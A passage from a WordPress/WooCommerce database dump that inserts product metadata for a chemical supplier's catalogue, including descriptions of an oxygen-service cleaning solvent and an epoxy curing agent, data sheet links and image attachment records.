width="118"></td>\r\n<td width="147">Clear, colorless</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (17965, 1834, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (17966, 1834, '716_default_editor', 'This product is used for the final rinse of parts used in Oxygen Service. This product also can be used for precision and specialty applications in many industries such as Electronics, Military, Aerospace, and Communications.  It is ideally suited for removing mineral oil, vacuum oil, wax, heavy grease, cutting oil, stamping oil, hydraulic oil, and gear oil.'); 
INSERT INTO `wp_postmeta` VALUES (17967, 1834, '719_default_editor', '<ul>\r\n 	<li>Listed by ASTM and CGA (ASTM G93; CGA Directory of Cleaning Agents for Oxygen Service)</li>\r\n 	<li>PASSES LOX Impact test (NFEN 1797)</li>\r\n 	<li>Approved by major gas producers and aerospace manufacturers</li>\r\n 	<li>RoHS compliant</li>\r\n 	<li>Non-Flammable</li>\r\n</ul>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (17968, 1834, '318_custom_list_file', 'a:1:{s:32:"821051e624aaa0dd50406bd4846a6cb1";a:3:{s:4:"name";s:7:"MS-752U";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-752U.pdf";s:4:"desc";s:11:"MS-752U TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (17969, 1834, '317_default_editor', 'Gallon and 20 Gallon Stainless Steel Drum.'); 
INSERT INTO `wp_postmeta` VALUES (17970, 1834, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (17971, 1834, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (17972, 1834, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17973, 1834, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17974, 1834, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (17975, 1834, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17976, 1834, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (17977, 1834, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (17978, 1834, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (17979, 1834, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (17980, 1834, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (17981, 1834, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17982, 1834, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17983, 1834, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17984, 1834, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (17985, 1834, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (17986, 1834, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (17987, 1834, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (17988, 1834, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17989, 1834, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (17990, 1834, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (17991, 1834, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17992, 1834, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (17993, 1834, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (17994, 1834, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (17995, 1842, '_edit_lock', '1501701014:317'); 
INSERT INTO `wp_postmeta` VALUES (17996, 1842, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (17997, 1842, '_footer', 'normal'); 
INSERT INTO `wp_postmeta` VALUES (17998, 1842, '_wp_page_template', 'default'); 
INSERT INTO `wp_postmeta` VALUES (18001, 1846, '_wp_attached_file', '2016/08/electrical-contact-lubricant-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18002, 1846, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2999;s:6:"height";i:1999;s:4:"file";s:42:"2016/08/electrical-contact-lubricant-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:44:"electrical-contact-lubricant-1-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18003, 1834, '_thumbnail_id', '1832'); 
INSERT INTO `wp_postmeta` VALUES (18004, 1851, '_edit_lock', '1474385443:2'); 
INSERT INTO `wp_postmeta` VALUES (18005, 1851, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (18006, 1851, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (18007, 1851, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (18008, 1851, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18009, 1851, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18010, 1851, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18011, 1851, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18012, 1851, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18013, 1851, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (18014, 1851, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (18015, 1851, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18016, 1851, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18017, 1851, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (18018, 1851, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18019, 1851, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (18020, 1851, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (18021, 1851, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (18022, 1851, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (18023, 1851, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (18024, 1851, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18025, 1851, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18026, 1851, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18027, 1851, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (18028, 1851, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (18029, 1851, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18030, 1851, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (18031, 1851, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18032, 1851, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18033, 1851, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (18034, 1851, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18035, 1851, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18036, 1851, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (18037, 1851, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (18038, 1852, '_edit_lock', '1474650870:2'); 
INSERT INTO `wp_postmeta` VALUES (18039, 1852, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (18040, 1852, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (18041, 1852, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (18042, 1852, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18043, 1852, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18044, 1852, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18045, 1852, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18046, 1852, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18047, 1852, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (18048, 1852, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (18049, 1852, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18050, 1852, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18051, 1852, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (18052, 1852, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18053, 1852, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (18054, 1852, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (18055, 1852, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (18056, 1852, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (18057, 1852, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (18058, 1852, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18059, 1852, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18060, 1852, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18061, 1852, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (18062, 1852, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (18063, 1852, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (18064, 1852, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (18065, 1852, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18066, 1852, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18067, 1852, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (18068, 1852, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18069, 1852, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (18070, 1852, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (18071, 1852, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (18072, 1853, '_wp_attached_file', '2016/09/COBRA-BRUSH.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18073, 1853, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/09/COBRA-BRUSH.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"COBRA-BRUSH-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"COBRA-BRUSH-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"COBRA-BRUSH-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"COBRA-BRUSH-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"COBRA-BRUSH-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"COBRA-BRUSH-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"COBRA-BRUSH-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"COBRA-BRUSH-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18074, 1851, '_thumbnail_id', '1853'); 
INSERT INTO `wp_postmeta` VALUES (18075, 1854, '_wp_attached_file', '2016/09/G0831B.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18076, 1854, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/G0831B.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"G0831B-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"G0831B-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"G0831B-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"G0831B-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"G0831B-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"G0831B-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"G0831B-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"G0831B-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18077, 1855, '_wp_attached_file', '2016/09/MS-907.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18078, 1855, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-907.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-907-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-907-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-907-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-907-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-907-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-907-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-907-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-907-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18079, 1149, '_thumbnail_id', '1855'); 
INSERT INTO `wp_postmeta` VALUES (18080, 1149, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18081, 1856, '_wp_attached_file', '2016/09/MS-538.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18082, 1856, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-538.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-538-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-538-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-538-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-538-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-538-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-538-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-538-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-538-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18083, 1857, '_wp_attached_file', '2016/09/electrical-contact-lubricant-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18084, 1857, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4338;s:6:"height";i:2892;s:4:"file";s:42:"2016/09/electrical-contact-lubricant-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:44:"electrical-contact-lubricant-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"electrical-contact-lubricant-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18085, 1836, '_thumbnail_id', '1857'); 
INSERT INTO `wp_postmeta` VALUES (18086, 1858, '_wp_attached_file', '2016/09/MS-720L.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18087, 1858, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:19:"2016/09/MS-720L.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-720L-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-720L-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-720L-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-720L-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-720L-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-720L-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-720L-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-720L-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18088, 1707, '_thumbnail_id', '1858'); 
INSERT INTO `wp_postmeta` VALUES (18089, 1865, '_edit_lock', '1474901942:2'); 
INSERT INTO `wp_postmeta` VALUES (18090, 1865, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (18091, 1866, '_edit_lock', '1474468127:2'); 
INSERT INTO `wp_postmeta` VALUES (18092, 1866, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (18093, 1867, '_wp_attached_file', '2016/09/3125.pdf'); 
INSERT INTO `wp_postmeta` VALUES (18094, 1866, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (18095, 1866, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (18096, 1866, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18097, 1866, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18098, 1866, '716_default_editor', '<strong>Application Areas/Suggested Uses:</strong>\r\n<ul>\r\n 	<li>Maintenance and marine coatings</li>\r\n 	<li>Coal tar epoxy systems</li>\r\n 	<li>Potting, casting, and encapsulation</li>\r\n 	<li>Adhesives, caulks and grouts</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (18099, 1866, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (18100, 1866, '318_custom_list_file', 'a:2:{s:32:"ae8c7e863b7cb0e3cac0b075f0681db2";a:3:{s:4:"name";s:12:"EPIKURE 3125";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3125.pdf";s:4:"desc";s:12:"EPIKURE 3125";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (18101, 1866, '317_default_editor', 'quarts, gallons, 5 gallon'); 
INSERT INTO `wp_postmeta` VALUES (18102, 1866, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (18103, 1866, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (18104, 1866, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18105, 1866, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18106, 1866, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (18107, 1866, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (18108, 1866, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (18109, 1866, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (18110, 1866, '_width', ''); 
